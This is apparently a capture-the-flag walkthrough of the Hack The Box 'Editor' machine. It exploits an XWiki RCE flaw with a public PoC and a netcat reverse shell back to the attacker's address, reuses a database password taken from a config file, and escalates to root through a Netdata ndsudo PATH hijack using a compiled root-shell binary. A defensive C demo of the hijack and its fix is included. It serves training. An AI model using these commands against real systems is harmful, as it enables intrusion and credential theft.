Editor — HTB Walkthrough
2026-1-4 06:28:27 Author: infosecwriteups.com

Death Esther

Introduction

This walkthrough covers the Editor machine on Hack The Box, an Easy Linux box. I gained initial access by exploiting CVE-2025-24893 in XWiki to get a shell as the xwiki user. Further enumeration revealed a misconfigured Netdata ndsudo plugin vulnerable to CVE-2024-32019, which allowed me to escalate to root. This box demonstrates how outdated software and misconfigurations can lead to full system compromise.

Room Link: https://app.hackthebox.com/machines/Editor

Enumeration

I began by adding the target IP to my hosts file for easier access:

echo "10.10.11.80 editor.htb" | sudo tee -a /etc/hosts

Next, I ran an Nmap scan to identify open ports and services:

nmap -sV -sC -Pn 10.10.11.80

Scan results revealed:

  • 22/tcp: OpenSSH 8.9p1 (Ubuntu)
  • 80/tcp: nginx 1.18.0, redirects to http://editor.htb/
  • 8080/tcp: Jetty 10.0.20 hosting XWiki, with WebDAV enabled and several disallowed paths in robots.txt.

Visiting the XWiki instance on port 8080, I checked the version at the bottom of the page:

XWiki Version: 15.10.8


This confirmed that XWiki 15.10.8 was running on port 8080 and would be the initial target for exploitation.

Vulnerability Identification

The version banner matched CVE-2025-24893, which affects XWiki releases before 15.10.11 (and the 16.x line before 16.4.1). It is an unauthenticated remote code execution flaw: the SolrSearch page renders the caller-supplied search text as wiki markup, so a guest user with no account can inject a {{groovy}} script through the text parameter of the SolrSearch RSS feed and have it executed server-side. No credentials were needed for the exploit below. A public proof-of-concept (PoC) is available in the gunzf0x/CVE-2025-24893 repository on GitHub.

Exploitation (Reverse Shell)

To exploit the vulnerability and gain initial access, I cloned the PoC repository and prepared a reverse shell payload:

git clone https://github.com/gunzf0x/CVE-2025-24893
cd CVE-2025-24893

Before launching the exploit, I started a Netcat listener on my attacking machine so the reverse shell would have something to connect back to:

nc -lnvp 4444

Then I ran the exploit against the XWiki instance, passing a busybox reverse-shell one-liner as the command to execute (10.10.14.25 is my VPN address):

python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.14.25 4444 -e /bin/bash'

The connection came back and I had a shell as the xwiki user, the account the XWiki service runs under.


To make the shell fully interactive and easier to work with, I upgraded it to a pseudo-terminal (PTY):

python3 -c 'import pty; pty.spawn("/bin/bash")'

This gives a proper terminal for programs that refuse to run without a TTY (su and ssh, for example). Full tab completion and job control additionally require backgrounding the shell, running stty raw -echo on the attacker side and foregrounding it again; the bare pty.spawn was enough for the enumeration and privilege escalation that follow.

Discovering User Credentials — oliver

While exploring the system, I noticed a home directory for another user:

cd /home
ls
# Output: oliver

Attempting to enter the directory showed that access was denied:

cd oliver
# bash: cd: oliver: Permission denied

This prompted me to look for stored credentials. XWiki keeps its database connection settings in hibernate.cfg.xml, which the xwiki service account can read, so I searched it for passwords:

grep -n password /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml

Output included several entries, among which one stood out:

<property name="hibernate.connection.password">theEd1t0rTeam99</property>

This is the password XWiki uses for its database backend rather than a user account password, but password reuse between services and local accounts is common, so theEd1t0rTeam99 was worth trying against oliver. If it worked, it would give access to that user's home directory and a foothold for further escalation.

User Flag.txt

Using the credentials discovered in the XWiki configuration, I was able to SSH into the machine as oliver:

ssh oliver@editor.htb

Once logged in, I navigated to the home directory and verified the contents:

ls
# Output: user.txt

Reading the user flag confirmed initial access:

cat user.txt

Privilege Escalation

While enumerating the system for potential privilege escalation paths, I searched for SUID binaries:

find / -type f -perm -4000 -user root 2>/dev/null

Among the results was a setuid-root binary shipped with Netdata, which is installed under its own prefix in /opt/netdata:

/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

ndsudo is Netdata's helper for running a short allow-list of privileged commands (nvme-list runs the nvme tool, for instance) on behalf of the unprivileged netdata process. Versions affected by CVE-2024-32019 locate those commands by searching the PATH inherited from the caller instead of a fixed system path, so any user permitted to execute ndsudo can prepend a writable directory to PATH, drop a malicious binary named after an allow-listed command there, and have it executed as root. Before relying on this, check the binary's mode and group to confirm your current user (here oliver) is actually allowed to run it.

Exploitation

On my local machine, I created a small C program that simply hands over a root shell when ndsudo executes it:

nano exploit.c

Content of exploit.c:

#include <unistd.h>

/* Saved as "nvme": ndsudo (setuid root) will exec it in place of the real
 * nvme tool once /tmp is first on PATH. The effective uid is already 0 at
 * that point; setuid(0)/setgid(0) make the real ids root as well so that
 * bash does not drop the privileges when it starts. */
int main(void) {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 1; /* only reached if execl fails */
}

Compile it locally, naming the output after the allow-listed command ndsudo will look for (build it for the target's architecture, and add -static if your glibc is newer than the target's to avoid version mismatches):

gcc exploit.c -o nvme

Transfer the binary to the target system using oliver's credentials:

scp nvme oliver@editor.htb:/tmp

Execution on Target

On the target machine, prepare and run the exploit:

cd /tmp
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

This executed the nvme binary with root privileges, giving a root shell.
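To make the mechanism concrete, here is an added example of my own, not code from this write-up or from Netdata's sources, modelling in C the two ways a setuid helper like ndsudo can resolve the program it is about to run. resolve_vulnerable searches the caller's PATH, the behaviour abused by CVE-2024-32019; resolve_hardened ignores the environment and searches a fixed list of root-owned directories, which is the kind of fix that closes the hole. The fake nvme and the scratch directory are constructed by the program itself, and the trusted directory list is an assumption for illustration rather than a quote of Netdata's patch.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Walk a ':'-separated directory list looking for an executable called `name`.
 * On success copies the full path into `out` and returns 1; otherwise returns 0. */
static int resolve_in(const char *name, const char *dirs, char *out, size_t outlen) {
    char *copy = strdup(dirs);
    int found = 0;
    if (!copy) return 0;
    for (char *dir = strtok(copy, ":"); dir && !found; dir = strtok(NULL, ":")) {
        if (snprintf(out, outlen, "%s/%s", dir, name) >= (int)outlen) continue;
        if (access(out, X_OK) == 0) found = 1;
    }
    free(copy);
    if (!found && outlen > 0) out[0] = '\0';
    return found;
}

/* Vulnerable pattern (what CVE-2024-32019 abused): the setuid helper resolves the
 * target through the PATH it inherited from its unprivileged caller. */
int resolve_vulnerable(const char *name, char *out, size_t outlen) {
    const char *path = getenv("PATH");
    return path ? resolve_in(name, path, out, outlen) : 0;
}

/* Hardened pattern: the environment is ignored and only root-owned system
 * directories are searched, so a writable /tmp on PATH buys the caller nothing.
 * The list below is an assumed example, not Netdata's actual patch. */
int resolve_hardened(const char *name, char *out, size_t outlen) {
    static const char trusted[] =
        "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
    return resolve_in(name, trusted, out, outlen);
}

/* Constructed fixture: a scratch directory holding a fake, executable "nvme",
 * standing in for the attacker's /tmp/nvme from the walkthrough. */
static int make_fake_nvme(char *dir, size_t dirlen) {
    const char *base = getenv("TMPDIR");
    char path[4096];
    snprintf(dir, dirlen, "%s/ndsudo-demo-XXXXXX", base ? base : "/tmp");
    if (!mkdtemp(dir)) return 0;
    snprintf(path, sizeof path, "%s/nvme", dir);
    FILE *f = fopen(path, "w");
    if (!f) return 0;
    fputs("#!/bin/sh\necho hijacked\n", f);
    fclose(f);
    return chmod(path, 0755) == 0;
}

static void remove_fake_nvme(const char *dir) {
    char path[4096];
    snprintf(path, sizeof path, "%s/nvme", dir);
    unlink(path);
    rmdir(dir);
}

/* Reproduces the walkthrough's PATH hijack against the vulnerable resolver and
 * shows that the hardened resolver is unaffected. Returns a bitmask:
 * bit 0 set if the vulnerable resolver picked the fake nvme,
 * bit 1 set if the hardened resolver refused it; -1 if the fixture failed. */
int run_demo(void) {
    char dir[256], hijacked_path[4096], resolved[4096], path_env[4352];
    int result = 0;
    if (!make_fake_nvme(dir, sizeof dir)) return -1;
    snprintf(hijacked_path, sizeof hijacked_path, "%s/nvme", dir);
    snprintf(path_env, sizeof path_env, "%s:/usr/sbin:/usr/bin:/sbin:/bin", dir);
    setenv("PATH", path_env, 1);                 /* export PATH=/tmp:$PATH */

    if (resolve_vulnerable("nvme", resolved, sizeof resolved) &&
        strcmp(resolved, hijacked_path) == 0)
        result |= 1;                             /* ndsudo would exec our binary as root */

    if (!resolve_hardened("nvme", resolved, sizeof resolved) ||
        strcmp(resolved, hijacked_path) != 0)
        result |= 2;                             /* hardened helper never looks in our dir */

    remove_fake_nvme(dir);
    return result;
}

/* Sanity check that the trusted list still finds legitimate system binaries. */
int hardened_finds(const char *name) {
    char resolved[4096];
    return resolve_hardened(name, resolved, sizeof resolved);
}

int main(void) {
    int r = run_demo();
    printf("vulnerable resolver hijacked: %s\n", (r & 1) ? "yes" : "no");
    printf("hardened resolver hijacked:   %s\n", (r & 2) ? "no" : "yes");
    printf("hardened resolver finds sh:   %s\n", hardened_finds("sh") ? "yes" : "no");
    return 0;
}
```

Build with gcc -o ndsudo-demo ndsudo-demo.c and run it as an ordinary user: the first line should read "yes" and the second "no". The lesson generalises to any setuid or sudo-invoked wrapper: never resolve helper programs through an environment the caller controls. For defenders, a setuid-root binary under a non-standard prefix such as /opt/netdata deserves a version check, since software installed outside the distribution's package manager is easy to leave unpatched.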

Root Access & Flag

After successfully exploiting the vulnerable Netdata ndsudo plugin, I gained a root shell:

whoami
# Output: root

Navigating to the root directory, I captured the final flag:

cat /root/root.txt

Thanks for reading, and I hope this write-up helps others sharpen their penetration testing and privilege escalation skills.

Ready to level up your hacking skills?

Join Hack The Box — the ultimate platform to learn penetration testing and cyber security hands-on.


Source: https://infosecwriteups.com/editor-htb-walkthrough-2b29bac28300?source=rss----7b722bfd1b8d---4